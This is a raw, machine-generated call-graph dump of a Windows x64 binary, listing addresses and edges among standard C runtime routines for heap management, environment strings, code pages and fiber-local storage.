7ff73339c199 21239->21247 21260 7ff73339c5c8 21239->21260 21241 7ff73339c159 21263 7ff7333a9f50 21241->21263 21247->21237 21248 7ff73339c1b5 21247->21248 21250 7ff7333aaaf1 21249->21250 21251 7ff7333a5e48 _get_daylight 11 API calls 21250->21251 21252 7ff7333aaaf9 21250->21252 21253 7ff7333aab08 21251->21253 21252->21235 21254 7ff7333ab824 _invalid_parameter_noinfo 37 API calls 21253->21254 21254->21252 21256 7ff73339c429 21255->21256 21259 7ff73339c42e __scrt_release_startup_lock 21255->21259 21257 7ff73339c6fc 7 API calls 21256->21257 21256->21259 21258 7ff73339c4a2 21257->21258 21259->21239 21288 7ff73339c58c 21260->21288 21262 7ff73339c5d1 21262->21241 21264 7ff7333a9f70 21263->21264 21278 7ff73339c165 21263->21278 21265 7ff7333a9f78 21264->21265 21266 7ff7333a9f8e GetModuleFileNameW 21264->21266 21267 7ff7333a5e48 _get_daylight 11 API calls 21265->21267 21270 7ff7333a9fb9 21266->21270 21268 7ff7333a9f7d 21267->21268 21269 7ff7333ab824 _invalid_parameter_noinfo 37 API calls 21268->21269 21269->21278 21271 7ff7333a9ef0 11 API calls 21270->21271 21272 7ff7333a9ff9 21271->21272 21273 7ff7333aa001 21272->21273 21277 7ff7333aa019 21272->21277 21274 7ff7333a5e48 _get_daylight 11 API calls 21273->21274 21275 7ff7333aa006 21274->21275 21276 7ff7333ab464 __free_lconv_mon 11 API calls 21275->21276 21276->21278 21280 7ff7333aa080 21277->21280 21281 7ff7333aa067 21277->21281 21285 7ff7333aa03b 21277->21285 21278->21247 21287 7ff73339c69c InitializeSListHead 21278->21287 21279 7ff7333ab464 __free_lconv_mon 11 API calls 21279->21278 21283 7ff7333ab464 __free_lconv_mon 11 API calls 21280->21283 21282 7ff7333ab464 __free_lconv_mon 11 API calls 21281->21282 21284 7ff7333aa070 21282->21284 21283->21285 21286 7ff7333ab464 __free_lconv_mon 11 API calls 21284->21286 21285->21279 21286->21278 21289 7ff73339c5a6 21288->21289 21291 7ff73339c59f 21288->21291 21292 7ff7333ab16c 21289->21292 21291->21262 21295 7ff7333aada8 21292->21295 21302 7ff7333b1548 EnterCriticalSection 21295->21302 16922 7ff73339b0a0 16923 7ff73339b0ce 16922->16923 16924 7ff73339b0b5 16922->16924 16924->16923 16927 7ff7333ae6c4 16924->16927 16928 7ff7333ae70f 16927->16928 16932 7ff7333ae6d3 _get_daylight 16927->16932 16937 7ff7333a5e48 16928->16937 16930 7ff7333ae6f6 HeapAlloc 16931 7ff73339b12e 16930->16931 16930->16932 16932->16928 16932->16930 16934 7ff7333b4800 16932->16934 16940 7ff7333b4840 16934->16940 16946 7ff7333ac1c8 GetLastError 16937->16946 16939 7ff7333a5e51 16939->16931 16945 7ff7333b1548 EnterCriticalSection 16940->16945 16947 7ff7333ac209 FlsSetValue 16946->16947 16951 7ff7333ac1ec 16946->16951 16948 7ff7333ac21b 16947->16948 16960 7ff7333ac1f9 SetLastError 16947->16960 16963 7ff7333afe04 16948->16963 16951->16947 16951->16960 16953 7ff7333ac248 FlsSetValue 16955 7ff7333ac266 16953->16955 16956 7ff7333ac254 FlsSetValue 16953->16956 16954 7ff7333ac238 FlsSetValue 16957 7ff7333ac241 16954->16957 16976 7ff7333abdfc 16955->16976 16956->16957 16970 7ff7333ab464 16957->16970 16960->16939 16968 7ff7333afe15 _get_daylight 16963->16968 16964 7ff7333afe66 16967 7ff7333a5e48 _get_daylight 10 API calls 16964->16967 16965 7ff7333afe4a HeapAlloc 16966 7ff7333ac22a 16965->16966 16965->16968 16966->16953 16966->16954 16967->16966 16968->16964 16968->16965 16969 7ff7333b4800 _get_daylight 2 API calls 16968->16969 16969->16968 16971 7ff7333ab469 RtlFreeHeap 16970->16971 16975 7ff7333ab498 16970->16975 16972 7ff7333ab484 GetLastError 16971->16972 16971->16975 16973 7ff7333ab491 __free_lconv_mon 16972->16973 16974 7ff7333a5e48 _get_daylight 9 API calls 16973->16974 16974->16975 16975->16960 16981 7ff7333abcd4 16976->16981 16993 7ff7333b1548 EnterCriticalSection 16981->16993 21448 7ff7333b2920 21459 7ff7333b8654 21448->21459 21460 7ff7333b8661 21459->21460 21461 7ff7333ab464 __free_lconv_mon 11 API calls 21460->21461 21462 7ff7333b867d 21460->21462 21461->21460 21463 7ff7333ab464 __free_lconv_mon 11 API calls 21462->21463 21464 7ff7333b2929 21462->21464 21463->21462 21465 7ff7333b1548 EnterCriticalSection 21464->21465 17377 7ff7333aa899 17389 7ff7333ab358 17377->17389 17390 7ff7333ac050 __CxxCallCatchBlock 45 API calls 17389->17390 17391 7ff7333ab361 17390->17391 17392 7ff7333ab40c __CxxCallCatchBlock 45 API calls 17391->17392 17393 7ff7333ab381 17392->17393 17394 7ff7333b1b38 17395 7ff7333b1b5c 17394->17395 17397 7ff7333b1b6c 17394->17397 17396 7ff7333a5e48 _get_daylight 11 API calls 17395->17396 17415 7ff7333b1b61 17396->17415 17398 7ff7333b1e4c 17397->17398 17399 7ff7333b1b8e 17397->17399 17400 7ff7333a5e48 _get_daylight 11 API calls 17398->17400 17401 7ff7333b1baf 17399->17401 17543 7ff7333b21f4 17399->17543 17402 7ff7333b1e51 17400->17402 17405 7ff7333b1c21 17401->17405 17407 7ff7333b1bd5 17401->17407 17411 7ff7333b1c15 17401->17411 17404 7ff7333ab464 __free_lconv_mon 11 API calls 17402->17404 17404->17415 17409 7ff7333afe04 _get_daylight 11 API calls 17405->17409 17425 7ff7333b1be4 17405->17425 17406 7ff7333b1cce 17419 7ff7333b1ceb 17406->17419 17426 7ff7333b1d3d 17406->17426 17558 7ff7333aa5fc 17407->17558 17412 7ff7333b1c37 17409->17412 17411->17406 17411->17425 17564 7ff7333b839c 17411->17564 17416 7ff7333ab464 __free_lconv_mon 11 API calls 17412->17416 17414 7ff7333ab464 __free_lconv_mon 11 API calls 17414->17415 17421 7ff7333b1c45 17416->17421 17417 7ff7333b1bdf 17422 7ff7333a5e48 _get_daylight 11 API calls 17417->17422 17418 7ff7333b1bfd 17418->17411 17424 7ff7333b21f4 45 API calls 17418->17424 17420 7ff7333ab464 __free_lconv_mon 11 API calls 17419->17420 17423 7ff7333b1cf4 17420->17423 17421->17411 17421->17425 17429 7ff7333afe04 _get_daylight 11 API calls 17421->17429 17422->17425 17435 7ff7333b1cf9 17423->17435 17600 7ff7333b464c 17423->17600 17424->17411 17425->17414 17426->17425 17427 7ff7333b464c 40 API calls 17426->17427 17428 7ff7333b1d7a 17427->17428 17430 7ff7333ab464 __free_lconv_mon 11 API calls 17428->17430 17432 7ff7333b1c67 17429->17432 17433 7ff7333b1d84 17430->17433 17437 7ff7333ab464 __free_lconv_mon 11 API calls 17432->17437 17433->17425 17433->17435 17434 7ff7333b1e40 17438 7ff7333ab464 __free_lconv_mon 11 API calls 17434->17438 17435->17434 17440 7ff7333afe04 _get_daylight 11 API calls 17435->17440 17436 7ff7333b1d25 17439 7ff7333ab464 __free_lconv_mon 11 API calls 17436->17439 17437->17411 17438->17415 17439->17435 17441 7ff7333b1dc8 17440->17441 17442 7ff7333b1dd0 17441->17442 17443 7ff7333b1dd9 17441->17443 17445 7ff7333ab464 __free_lconv_mon 11 API calls 17442->17445 17525 7ff7333ab3ac 17443->17525 17447 7ff7333b1dd7 17445->17447 17452 7ff7333ab464 __free_lconv_mon 11 API calls 17447->17452 17448 7ff7333b1df0 17609 7ff7333b84b4 17448->17609 17449 7ff7333b1e7b 17451 7ff7333ab844 _isindst 17 API calls 17449->17451 17454 7ff7333b1e8f 17451->17454 17452->17415 17457 7ff7333b1eb8 17454->17457 17462 7ff7333b1ec8 17454->17462 17455 7ff7333b1e17 17458 7ff7333a5e48 _get_daylight 11 API calls 17455->17458 17456 7ff7333b1e38 17460 7ff7333ab464 __free_lconv_mon 11 API calls 17456->17460 17459 7ff7333a5e48 _get_daylight 11 API calls 17457->17459 17461 7ff7333b1e1c 17458->17461 17484 7ff7333b1ebd 17459->17484 17460->17434 17464 7ff7333ab464 __free_lconv_mon 11 API calls 17461->17464 17463 7ff7333b21ab 17462->17463 17465 7ff7333b1eea 17462->17465 17466 7ff7333a5e48 _get_daylight 11 API calls 17463->17466 17464->17447 17467 7ff7333b1f07 17465->17467 17628 7ff7333b22dc 17465->17628 17468 7ff7333b21b0 17466->17468 17471 7ff7333b1f7b 17467->17471 17473 7ff7333b1f2f 17467->17473 17479 7ff7333b1f6f 17467->17479 17470 7ff7333ab464 __free_lconv_mon 11 API calls 17468->17470 17470->17484 17475 7ff7333b1fa3 17471->17475 17480 7ff7333afe04 _get_daylight 11 API calls 17471->17480 17495 7ff7333b1f3e 17471->17495 17472 7ff7333b202e 17483 7ff7333b204b 17472->17483 17492 7ff7333b209e 17472->17492 17643 7ff7333aa638 17473->17643 17477 7ff7333afe04 _get_daylight 11 API calls 17475->17477 17475->17479 17475->17495 17482 7ff7333b1fc5 17477->17482 17478 7ff7333ab464 __free_lconv_mon 11 API calls 17478->17484 17479->17472 17479->17495 17649 7ff7333b825c 17479->17649 17485 7ff7333b1f95 17480->17485 17488 7ff7333ab464 __free_lconv_mon 11 API calls 17482->17488 17489 7ff7333ab464 __free_lconv_mon 11 API calls 17483->17489 17490 7ff7333ab464 __free_lconv_mon 11 API calls 17485->17490 17486 7ff7333b1f39 17491 7ff7333a5e48 _get_daylight 11 API calls 17486->17491 17487 7ff7333b1f57 17487->17479 17494 7ff7333b22dc 45 API calls 17487->17494 17488->17479 17493 7ff7333b2054 17489->17493 17490->17475 17491->17495 17492->17495 17496 7ff7333b464c 40 API calls 17492->17496 17499 7ff7333b464c 40 API calls 17493->17499 17502 7ff7333b205a 17493->17502 17494->17479 17495->17478 17497 7ff7333b20dc 17496->17497 17498 7ff7333ab464 __free_lconv_mon 11 API calls 17497->17498 17500 7ff7333b20e6 17498->17500 17503 7ff7333b2086 17499->17503 17500->17495 17500->17502 17501 7ff7333b219f 17504 7ff7333ab464 __free_lconv_mon 11 API calls 17501->17504 17502->17501 17506 7ff7333afe04 _get_daylight 11 API calls 17502->17506 17505 7ff7333ab464 __free_lconv_mon 11 API calls 17503->17505 17504->17484 17505->17502 17507 7ff7333b212b 17506->17507 17508 7ff7333b2133 17507->17508 17509 7ff7333b213c 17507->17509 17511 7ff7333ab464 __free_lconv_mon 11 API calls 17508->17511 17534 7ff7333b16e4 17509->17534 17512 7ff7333b213a 17511->17512 17519 7ff7333ab464 __free_lconv_mon 11 API calls 17512->17519 17514 7ff7333b2152 SetEnvironmentVariableW 17516 7ff7333b2176 17514->17516 17517 7ff7333b2197 17514->17517 17515 7ff7333b21df 17518 7ff7333ab844 _isindst 17 API calls 17515->17518 17520 7ff7333a5e48 _get_daylight 11 API calls 17516->17520 17522 7ff7333ab464 __free_lconv_mon 11 API calls 17517->17522 17521 7ff7333b21f3 17518->17521 17519->17484 17523 7ff7333b217b 17520->17523 17522->17501 17524 7ff7333ab464 __free_lconv_mon 11 API calls 17523->17524 17524->17512 17526 7ff7333ab3c3 17525->17526 17527 7ff7333ab3b9 17525->17527 17528 7ff7333a5e48 _get_daylight 11 API calls 17526->17528 17527->17526 17532 7ff7333ab3de 17527->17532 17529 7ff7333ab3ca 17528->17529 17530 7ff7333ab824 _invalid_parameter_noinfo 37 API calls 17529->17530 17531 7ff7333ab3d6 17530->17531 17531->17448 17531->17449 17532->17531 17533 7ff7333a5e48 _get_daylight 11 API calls 17532->17533 17533->17529 17535 7ff7333b16f1 17534->17535 17536 7ff7333b16fb 17534->17536 17535->17536 17540 7ff7333b1717 17535->17540 17537 7ff7333a5e48 _get_daylight 11 API calls 17536->17537 17542 7ff7333b1703 17537->17542 17538 7ff7333ab824 _invalid_parameter_noinfo 37 API calls 17539 7ff7333b170f 17538->17539 17539->17514 17539->17515 17540->17539 17541 7ff7333a5e48 _get_daylight 11 API calls 17540->17541 17541->17542 17542->17538 17544 7ff7333b2211 17543->17544 17545 7ff7333b2229 17543->17545 17544->17401 17546 7ff7333afe04 _get_daylight 11 API calls 17545->17546 17553 7ff7333b224d 17546->17553 17547 7ff7333b22d2 17549 7ff7333ab40c __CxxCallCatchBlock 45 API calls 17547->17549 17548 7ff7333b22ae 17550 7ff7333ab464 __free_lconv_mon 11 API calls 17548->17550 17551 7ff7333b22d8 17549->17551 17550->17544 17552 7ff7333afe04 _get_daylight 11 API calls 17552->17553 17553->17547 17553->17548 17553->17552 17554 7ff7333ab464 __free_lconv_mon 11 API calls 17553->17554 17555 7ff7333ab3ac __std_exception_copy 37 API calls 17553->17555 17556 7ff7333b22bd 17553->17556 17554->17553 17555->17553 17557 7ff7333ab844 _isindst 17 API calls 17556->17557 17557->17547 17559 7ff7333aa615 17558->17559 17560 7ff7333aa60c 17558->17560 17559->17417 17559->17418 17560->17559 17673 7ff7333aa0d4 17560->17673 17565 7ff7333b74c4 17564->17565 17566 7ff7333b83a9 17564->17566 17567 7ff7333b74d1 17565->17567 17572 7ff7333b7507 17565->17572 17568 7ff7333a5e8c 45 API calls 17566->17568 17570 7ff7333a5e48 _get_daylight 11 API calls 17567->17570 17584 7ff7333b7478 17567->17584 17569 7ff7333b83dd 17568->17569 17573 7ff7333b83e2 17569->17573 17577 7ff7333b83f3 17569->17577 17580 7ff7333b840a 17569->17580 17574 7ff7333b74db 17570->17574 17571 7ff7333b7531 17575 7ff7333a5e48 _get_daylight 11 API calls 17571->17575 17572->17571 17576 7ff7333b7556 17572->17576 17573->17411 17578 7ff7333ab824 _invalid_parameter_noinfo 37 API calls 17574->17578 17579 7ff7333b7536 17575->17579 17585 7ff7333a5e8c 45 API calls 17576->17585 17591 7ff7333b7541 17576->17591 17581 7ff7333a5e48 _get_daylight 11 API calls 17577->17581 17582 7ff7333b74e6 17578->17582 17583 7ff7333ab824 _invalid_parameter_noinfo 37 API calls 17579->17583 17587 7ff7333b8426 17580->17587 17588 7ff7333b8414 17580->17588 17586 7ff7333b83f8 17581->17586 17582->17411 17583->17591 17584->17411 17585->17591 17592 7ff7333ab824 _invalid_parameter_noinfo 37 API calls 17586->17592 17589 7ff7333b8437 17587->17589 17590 7ff7333b844e 17587->17590 17593 7ff7333a5e48 _get_daylight 11 API calls 17588->17593 17927 7ff7333b7514 17589->17927 17936 7ff7333ba1bc 17590->17936 17591->17411 17592->17573 17596 7ff7333b8419 17593->17596 17598 7ff7333ab824 _invalid_parameter_noinfo 37 API calls 17596->17598 17598->17573 17599 7ff7333a5e48 _get_daylight 11 API calls 17599->17573 17601 7ff7333b466e 17600->17601 17602 7ff7333b468b 17600->17602 17601->17602 17604 7ff7333b467c 17601->17604 17603 7ff7333b4695 17602->17603 17976 7ff7333b8ea8 17602->17976 17983 7ff7333b8ee4 17603->17983 17606 7ff7333a5e48 _get_daylight 11 API calls 17604->17606 17608 7ff7333b4681 memcpy_s 17606->17608 17608->17436 17610 7ff7333a5e8c 45 API calls 17609->17610 17611 7ff7333b851a 17610->17611 17613 7ff7333b8528 17611->17613 17995 7ff7333b0190 17611->17995 17998 7ff7333a6468 17613->17998 17616 7ff7333b8614 17619 7ff7333b8625 17616->17619 17620 7ff7333ab464 __free_lconv_mon 11 API calls 17616->17620 17617 7ff7333a5e8c 45 API calls 17618 7ff7333b8597 17617->17618 17622 7ff7333b0190 5 API calls 17618->17622 17625 7ff7333b85a0 17618->17625 17621 7ff7333b1e13 17619->17621 17623 7ff7333ab464 __free_lconv_mon 11 API calls 17619->17623 17620->17619 17621->17455 17621->17456 17622->17625 17623->17621 17624 7ff7333a6468 14 API calls 17626 7ff7333b85fb 17624->17626 17625->17624 17626->17616 17627 7ff7333b8603 SetEnvironmentVariableW 17626->17627 17627->17616 17629 7ff7333b22ff 17628->17629 17630 7ff7333b231c 17628->17630 17629->17467 17631 7ff7333afe04 _get_daylight 11 API calls 17630->17631 17637 7ff7333b2340 17631->17637 17632 7ff7333b23a1 17634 7ff7333ab464 __free_lconv_mon 11 API calls 17632->17634 17633 7ff7333ab40c __CxxCallCatchBlock 45 API calls 17635 7ff7333b23ca 17633->17635 17634->17629 17636 7ff7333afe04 _get_daylight 11 API calls 17636->17637 17637->17632 17637->17636 17638 7ff7333ab464 __free_lconv_mon 11 API calls 17637->17638 17639 7ff7333b16e4 37 API calls 17637->17639 17640 7ff7333b23b0 17637->17640 17642 7ff7333b23c4 17637->17642 17638->17637 17639->17637 17641 7ff7333ab844 _isindst 17 API calls 17640->17641 17641->17642 17642->17633 17644 7ff7333aa648 17643->17644 17647 7ff7333aa651 17643->17647 17644->17647 18020 7ff7333aa148 17644->18020 17647->17486 17647->17487 17650 7ff7333b8269 17649->17650 17654 7ff7333b8296 17649->17654 17651 7ff7333b826e 17650->17651 17650->17654 17652 7ff7333a5e48 _get_daylight 11 API calls 17651->17652 17653 7ff7333b8273 17652->17653 17656 7ff7333ab824 _invalid_parameter_noinfo 37 API calls 17653->17656 17655 7ff7333b82da 17654->17655 17657 7ff7333b82f9 17654->17657 17671 7ff7333b82ce __crtLCMapStringW 17654->17671 17658 7ff7333a5e48 _get_daylight 11 API calls 17655->17658 17659 7ff7333b827e 17656->17659 17660 7ff7333b8315 17657->17660 17661 7ff7333b8303 17657->17661 17662 7ff7333b82df 17658->17662 17659->17479 17664 7ff7333a5e8c 45 API calls 17660->17664 17663 7ff7333a5e48 _get_daylight 11 API calls 17661->17663 17665 7ff7333ab824 _invalid_parameter_noinfo 37 API calls 17662->17665 17666 7ff7333b8308 17663->17666 17667 7ff7333b8322 17664->17667 17665->17671 17668 7ff7333ab824 _invalid_parameter_noinfo 37 API calls 17666->17668 17667->17671 18067 7ff7333b9d78 17667->18067 17668->17671 17671->17479 17672 7ff7333a5e48 _get_daylight 11 API calls 17672->17671 17674 7ff7333aa0ed 17673->17674 17675 7ff7333aa0e9 17673->17675 17696 7ff7333b3860 17674->17696 17675->17559 17688 7ff7333aa428 17675->17688 17680 7ff7333aa0ff 17682 7ff7333ab464 __free_lconv_mon 11 API calls 17680->17682 17681 7ff7333aa10b 17722 7ff7333aa1b8 17681->17722 17682->17675 17685 7ff7333ab464 __free_lconv_mon 11 API calls 17686 7ff7333aa132 17685->17686 17687 7ff7333ab464 __free_lconv_mon 11 API calls 17686->17687 17687->17675 17689 7ff7333aa451 17688->17689 17694 7ff7333aa46a 17688->17694 17689->17559 17690 7ff7333afe04 _get_daylight 11 API calls 17690->17694 17691 7ff7333aa4fa 17693 7ff7333ab464 __free_lconv_mon 11 API calls 17691->17693 17692 7ff7333b1a58 WideCharToMultiByte 17692->17694 17693->17689 17694->17689 17694->17690 17694->17691 17694->17692 17695 7ff7333ab464 __free_lconv_mon 11 API calls 17694->17695 17695->17694 17697 7ff7333aa0f2 17696->17697 17698 7ff7333b386d 17696->17698 17702 7ff7333b3b9c GetEnvironmentStringsW 17697->17702 17741 7ff7333ac124 17698->17741 17703 7ff7333aa0f7 17702->17703 17704 7ff7333b3bcc 17702->17704 17703->17680 17703->17681 17705 7ff7333b1a58 WideCharToMultiByte 17704->17705 17706 7ff7333b3c1d 17705->17706 17707 7ff7333b3c24 FreeEnvironmentStringsW 17706->17707 17708 7ff7333ae6c4 _fread_nolock 12 API calls 17706->17708 17707->17703 17709 7ff7333b3c37 17708->17709 17710 7ff7333b3c3f 17709->17710 17711 7ff7333b3c48 17709->17711 17713 7ff7333ab464 __free_lconv_mon 11 API calls 17710->17713 17712 7ff7333b1a58 WideCharToMultiByte 17711->17712 17714 7ff7333b3c6b 17712->17714 17715 7ff7333b3c46 17713->17715 17716 7ff7333b3c6f 17714->17716 17717 7ff7333b3c79 17714->17717 17715->17707 17718 7ff7333ab464 __free_lconv_mon 11 API calls 17716->17718 17719 7ff7333ab464 __free_lconv_mon 11 API calls 17717->17719 17720 7ff7333b3c77 FreeEnvironmentStringsW 17718->17720 17719->17720 17720->17703 17723 7ff7333aa1dd 17722->17723 17724 7ff7333afe04 _get_daylight 11 API calls 17723->17724 17735 7ff7333aa213 17724->17735 17725 7ff7333ab464 __free_lconv_mon 11 API calls 17726 7ff7333aa113 17725->17726 17726->17685 17727 7ff7333aa28e 17728 7ff7333ab464 __free_lconv_mon 11 API calls 17727->17728 17728->17726 17729 7ff7333afe04 _get_daylight 11 API calls 17729->17735 17730 7ff7333aa27d 17921 7ff7333aa3e4 17730->17921 17731 7ff7333ab3ac __std_exception_copy 37 API calls 17731->17735 17734 7ff7333aa2b3 17737 7ff7333ab844 _isindst 17 API calls 17734->17737 17735->17727 17735->17729 17735->17730 17735->17731 17735->17734 17738 7ff7333ab464 __free_lconv_mon 11 API calls 17735->17738 17739 7ff7333aa21b 17735->17739 17736 7ff7333ab464 __free_lconv_mon 11 API calls 17736->17739 17740 7ff7333aa2c6 17737->17740 17738->17735 17739->17725 17742 7ff7333ac150 FlsSetValue 17741->17742 17743 7ff7333ac135 FlsGetValue 17741->17743 17744 7ff7333ac142 17742->17744 17746 7ff7333ac15d 17742->17746 17743->17744 17745 7ff7333ac14a 17743->17745 17747 7ff7333ab40c __CxxCallCatchBlock 45 API calls 17744->17747 17749 7ff7333ac148 17744->17749 17745->17742 17748 7ff7333afe04 _get_daylight 11 API calls 17746->17748 17750 7ff7333ac1c5 17747->17750 17751 7ff7333ac16c 17748->17751 17761 7ff7333b3534 17749->17761 17752 7ff7333ac18a FlsSetValue 17751->17752 17753 7ff7333ac17a FlsSetValue 17751->17753 17755 7ff7333ac196 FlsSetValue 17752->17755 17756 7ff7333ac1a8 17752->17756 17754 7ff7333ac183 17753->17754 17757 7ff7333ab464 __free_lconv_mon 11 API calls 17754->17757 17755->17754 17758 7ff7333abdfc _get_daylight 11 API calls 17756->17758 17757->17744 17759 7ff7333ac1b0 17758->17759 17760 7ff7333ab464 __free_lconv_mon 11 API calls 17759->17760 17760->17749 17784 7ff7333b37a4 17761->17784 17763 7ff7333b3569 17799 7ff7333b3234 17763->17799 17766 7ff7333b3586 17766->17697 17767 7ff7333ae6c4 _fread_nolock 12 API calls 17768 7ff7333b3597 17767->17768 17769 7ff7333b359f 17768->17769 17771 7ff7333b35ae 17768->17771 17770 7ff7333ab464 __free_lconv_mon 11 API calls 17769->17770 17770->17766 17771->17771 17806 7ff7333b38dc 17771->17806 17774 7ff7333b36aa 17775 7ff7333a5e48 _get_daylight 11 API calls 17774->17775 17776 7ff7333b36af 17775->17776 17779 7ff7333ab464 __free_lconv_mon 11 API calls 17776->17779 17777 7ff7333b3705 17778 7ff7333b376c 17777->17778 17817 7ff7333b3064 17777->17817 17783 7ff7333ab464 __free_lconv_mon 11 API calls 17778->17783 17779->17766 17780 7ff7333b36c4 17780->17777 17781 7ff7333ab464 __free_lconv_mon 11 API calls 17780->17781 17781->17777 17783->17766 17785 7ff7333b37c7 17784->17785 17786 7ff7333b37d1 17785->17786 17832 7ff7333b1548 EnterCriticalSection 17785->17832 17788 7ff7333b3843 17786->17788 17791 7ff7333ab40c __CxxCallCatchBlock 45 API calls 17786->17791 17788->17763 17792 7ff7333b385b 17791->17792 17794 7ff7333b38b2 17792->17794 17796 7ff7333ac124 50 API calls 17792->17796 17794->17763 17797 7ff7333b389c 17796->17797 17798 7ff7333b3534 65 API calls 17797->17798 17798->17794 17800 7ff7333a5e8c 45 API calls 17799->17800 17801 7ff7333b3248 17800->17801 17802 7ff7333b3266 17801->17802 17803 7ff7333b3254 GetOEMCP 17801->17803 17804 7ff7333b327b 17802->17804 17805 7ff7333b326b GetACP 17802->17805 17803->17804 17804->17766 17804->17767 17805->17804 17807 7ff7333b3234 47 API calls 17806->17807 17808 7ff7333b3909 17807->17808 17809 7ff7333b3a5f 17808->17809 17811 7ff7333b3946 IsValidCodePage 17808->17811 17816 7ff7333b3960 memcpy_s 17808->17816 17810 7ff73339bb10 _log10_special 8 API calls 17809->17810 17812 7ff7333b36a1 17810->17812 17811->17809 17813 7ff7333b3957 17811->17813 17812->17774 17812->17780 17814 7ff7333b3986 GetCPInfo 17813->17814 17813->17816 17814->17809 17814->17816 17833 7ff7333b334c 17816->17833 17920 7ff7333b1548 EnterCriticalSection 17817->17920 17834 7ff7333b3389 GetCPInfo 17833->17834 17835 7ff7333b347f 17833->17835 17834->17835 17841 7ff7333b339c 17834->17841 17836 7ff73339bb10 _log10_special 8 API calls 17835->17836 17838 7ff7333b351e 17836->17838 17838->17809 17844 7ff7333b40b0 17841->17844 17845 7ff7333a5e8c 45 API calls 17844->17845 17846 7ff7333b40f2 17845->17846 17864 7ff7333b0b10 17846->17864 17866 7ff7333b0b19 MultiByteToWideChar 17864->17866 17922 7ff7333aa285 17921->17922 17923 7ff7333aa3e9 17921->17923 17922->17736 17924 7ff7333aa412 17923->17924 17925 7ff7333ab464 __free_lconv_mon 11 API calls 17923->17925 17926 7ff7333ab464 __free_lconv_mon 11 API calls 17924->17926 17925->17923 17926->17922 17928 7ff7333b7531 17927->17928 17929 7ff7333b7548 17927->17929 17930 7ff7333a5e48 _get_daylight 11 API calls 17928->17930 17929->17928 17931 7ff7333b7556 17929->17931 17932 7ff7333b7536 17930->17932 17934 7ff7333a5e8c 45 API calls 17931->17934 17935 7ff7333b7541 17931->17935 17933 7ff7333ab824 _invalid_parameter_noinfo 37 API calls 17932->17933 17933->17935 17934->17935 17935->17573 17937 7ff7333a5e8c 45 API calls 17936->17937 17938 7ff7333ba1e1 17937->17938 17941 7ff7333b9e38 17938->17941 17944 7ff7333b9e86 17941->17944 17942 7ff73339bb10 _log10_special 8 API calls 17943 7ff7333b8475 17942->17943 17943->17573 17943->17599 17945 7ff7333b9f0d 17944->17945 17947 7ff7333b9ef8 GetCPInfo 17944->17947 17950 7ff7333b9f11 17944->17950 17946 7ff7333b0b10 _fread_nolock MultiByteToWideChar 17945->17946 17945->17950 17948 7ff7333b9fa5 17946->17948 17947->17945 17947->17950 17949 7ff7333ae6c4 _fread_nolock 12 API calls 17948->17949 17948->17950 17951 7ff7333b9fdc 17948->17951 17949->17951 17950->17942 17951->17950 17952 7ff7333b0b10 _fread_nolock MultiByteToWideChar 17951->17952 17953 7ff7333ba04a 17952->17953 17954 7ff7333ba12c 17953->17954 17955 7ff7333b0b10 _fread_nolock MultiByteToWideChar 17953->17955 17954->17950 17956 7ff7333ab464 __free_lconv_mon 11 API calls 17954->17956 17957 7ff7333ba070 17955->17957 17956->17950 17957->17954 17958 7ff7333ae6c4 _fread_nolock 12 API calls 17957->17958 17959 7ff7333ba09d 17957->17959 17958->17959 17959->17954 17960 7ff7333b0b10 _fread_nolock MultiByteToWideChar 17959->17960 17961 7ff7333ba114 17960->17961 17962 7ff7333ba134 17961->17962 17963 7ff7333ba11a 17961->17963 17970 7ff7333b01d4 17962->17970 17963->17954 17966 7ff7333ab464 __free_lconv_mon 11 API calls 17963->17966 17966->17954 17967 7ff7333ba173 17967->17950 17969 7ff7333ab464 __free_lconv_mon 11 API calls 17967->17969 17968 7ff7333ab464 __free_lconv_mon 11 API calls 17968->17967 17969->17950 17971 7ff7333aff7c __crtLCMapStringW 5 API calls 17970->17971 17972 7ff7333b0212 17971->17972 17973 7ff7333b021a 17972->17973 17974 7ff7333b043c __crtLCMapStringW 5 API calls 17972->17974 17973->17967 17973->17968 17975 7ff7333b0283 CompareStringW 17974->17975 17975->17973 17977 7ff7333b8eb1 17976->17977 17978 7ff7333b8eca HeapSize 17976->17978 17979 7ff7333a5e48 _get_daylight 11 API calls 17977->17979 17980 7ff7333b8eb6 17979->17980 17981 7ff7333ab824 _invalid_parameter_noinfo 37 API calls 17980->17981 17982 7ff7333b8ec1 17981->17982 17982->17603 17984 7ff7333b8f03 17983->17984 17985 7ff7333b8ef9 17983->17985 17987 7ff7333b8f08 17984->17987 17993 7ff7333b8f0f _get_daylight 17984->17993 17986 7ff7333ae6c4 _fread_nolock 12 API calls 17985->17986 17991 7ff7333b8f01 17986->17991 17988 7ff7333ab464 __free_lconv_mon 11 API calls 17987->17988 17988->17991 17989 7ff7333b8f42 HeapReAlloc 17989->17991 17989->17993 17990 7ff7333b8f15 17992 7ff7333a5e48 _get_daylight 11 API calls 17990->17992 17991->17608 17992->17991 17993->17989 17993->17990 17994 7ff7333b4800 _get_daylight 2 API calls 17993->17994 17994->17993 17996 7ff7333aff7c __crtLCMapStringW 5 API calls 17995->17996 17997 7ff7333b01b0 17996->17997 17997->17613 17999 7ff7333a6492 17998->17999 18000 7ff7333a64b6 17998->18000 18004 7ff7333ab464 __free_lconv_mon 11 API calls 17999->18004 18006 7ff7333a64a1 17999->18006 18001 7ff7333a6510 18000->18001 18002 7ff7333a64bb 18000->18002 18003 7ff7333b0b10 _fread_nolock MultiByteToWideChar 18001->18003 18005 7ff7333a64d0 18002->18005 18002->18006 18007 7ff7333ab464 __free_lconv_mon 11 API calls 18002->18007 18014 7ff7333a652c 18003->18014 18004->18006 18008 7ff7333ae6c4 _fread_nolock 12 API calls 18005->18008 18006->17616 18006->17617 18007->18005 18008->18006 18009 7ff7333a6533 GetLastError 18010 7ff7333a5dbc _fread_nolock 11 API calls 18009->18010 18012 7ff7333a6540 18010->18012 18011 7ff7333a656e 18011->18006 18015 7ff7333b0b10 _fread_nolock MultiByteToWideChar 18011->18015 18016 7ff7333a5e48 _get_daylight 11 API calls 18012->18016 18013 7ff7333a6561 18018 7ff7333ae6c4 _fread_nolock 12 API calls 18013->18018 18014->18009 18014->18011 18014->18013 18017 7ff7333ab464 __free_lconv_mon 11 API calls 18014->18017 18019 7ff7333a65b2 18015->18019 18016->18006 18017->18013 18018->18011 18019->18006 18019->18009 18021 7ff7333aa161 18020->18021 18022 7ff7333aa15d 18020->18022 18041 7ff7333b3cac GetEnvironmentStringsW 18021->18041 18022->17647 18033 7ff7333aa508 18022->18033 18025 7ff7333aa17a 18048 7ff7333aa2c8 18025->18048 18026 7ff7333aa16e 18027 7ff7333ab464 __free_lconv_mon 